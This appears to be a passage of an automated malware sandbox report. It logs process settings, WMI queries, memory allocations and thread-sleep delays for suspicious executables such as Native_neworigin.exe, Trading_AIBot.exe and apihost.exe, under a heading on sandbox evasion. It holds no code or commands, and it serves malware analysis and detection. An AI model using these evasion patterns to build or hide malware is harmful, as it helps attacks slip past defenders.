                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Juqmtmya.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\aymtmquJ.pifProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Juqmtmya.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\aymtmquJ.pifProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe; Memory allocated: 2C20000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe; Memory allocated: 2FC0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe; Memory allocated: 2C20000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe; Memory allocated: D00000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe; Memory allocated: 2980000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe; Memory allocated: 4980000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe; Memory allocated: 5BB0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe; Memory allocated: 2DBB0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe; Memory allocated: 2BE0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe; Memory allocated: 3250000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe; Memory allocated: 2DE0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe; Memory allocated: BB0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe; Memory allocated: 25F0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe; Memory allocated: 24B0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe; Memory allocated: 2C20000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe; Memory allocated: 2E60000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe; Memory allocated: 4E60000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe; Memory allocated: 10D0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe; Memory allocated: 2E50000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe; Memory allocated: 4E50000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe; Memory allocated: A80000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe; Memory allocated: 25D0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe; Memory allocated: 2370000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe; Code function: 9_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe; Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe; Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe; Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe; Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe; Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\wscript.exe; Window found: window name: WSH-Timer
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 2920
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe; Window / User API: threadDelayed 2205
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe; Window / User API: threadDelayed 7627
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe; Window / User API: threadDelayed 434
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe; API coverage: 9.1 %
                      Source: C:\Windows\SysWOW64\esentutl.exe TID: 2804; Thread sleep count: 99 > 30
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 6348; Thread sleep time: -30000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 6716; Thread sleep time: -8301034833169293s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 6716; Thread sleep time: -100000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 6764; Thread sleep count: 53 > 30
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 6716; Thread sleep time: -99332s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 6716; Thread sleep time: -99013s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 6716; Thread sleep time: -98821s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 6716; Thread sleep time: -98603s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 6716; Thread sleep time: -98405s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 6716; Thread sleep time: -98216s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 6716; Thread sleep time: -97896s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 6716; Thread sleep time: -97688s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 6716; Thread sleep time: -97510s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 6716; Thread sleep time: -97337s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 6716; Thread sleep time: -97130s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe TID: 1868; Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3944; Thread sleep count: 2920 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4824; Thread sleep time: -2767011611056431s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2924; Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 3572; Thread sleep time: -30000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe TID: 6760; Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 2460; Thread sleep time: -60000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5424; Thread sleep count: 39 > 30
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5424; Thread sleep time: -35971150943733603s >= -30000s
